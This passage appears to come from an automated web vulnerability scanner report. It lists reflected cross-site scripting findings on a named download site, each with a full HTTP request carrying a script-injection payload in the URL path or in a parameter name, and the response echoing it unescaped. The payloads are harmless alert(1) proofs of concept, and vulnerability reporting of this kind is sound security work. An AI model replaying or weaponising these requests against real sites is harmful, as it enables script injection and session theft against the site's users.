GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4" />
...[SNIP]...

4.1566. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf61"><script>alert(1)</script>fa8586d080a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1" />
...[SNIP]...

4.1567. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ac5"><script>alert(1)</script>c5960a7fdd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:57 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6" />
...[SNIP]...

4.1568. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff596"><script>alert(1)</script>281d8a3753f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1" />
...[SNIP]...

4.1569. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b459f"><script>alert(1)</script>c9490a838b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3" />
...[SNIP]...

4.1570. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e63"><script>alert(1)</script>0dbe9fe771e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1" />
...[SNIP]...

4.1571. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f09b"><script>alert(1)</script>50aa1ce8d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40" />
...[SNIP]...

4.1572. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea4d"><script>alert(1)</script>a510634e8be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1" />
...[SNIP]...

4.1573. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca996"><script>alert(1)</script>a4a17688857 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857" />
...[SNIP]...

4.1574. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea43c"><script>alert(1)</script>1d1fba47ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1" />
...[SNIP]...

4.1575. http://www.x64bitdownload.com/64-bit-nntp-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83928"><script>alert(1)</script>a5b455172b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2" />
...[SNIP]...

4.1576. http://www.x64bitdownload.com/64-bit-nntp-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9892e"><script>alert(1)</script>5d9734d7e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1" />
...[SNIP]...

4.1577. http://www.x64bitdownload.com/64-bit-nzb-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430b8"><script>alert(1)</script>a87f0fbe7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8" />
...[SNIP]...

4.1578. http://www.x64bitdownload.com/64-bit-nzb-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6ec"><script>alert(1)</script>984fa8fe340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1" />
...[SNIP]...

4.1579. http://www.x64bitdownload.com/64-bit-ozum-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdb3"><script>alert(1)</script>4b97b90929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929" />
...[SNIP]...

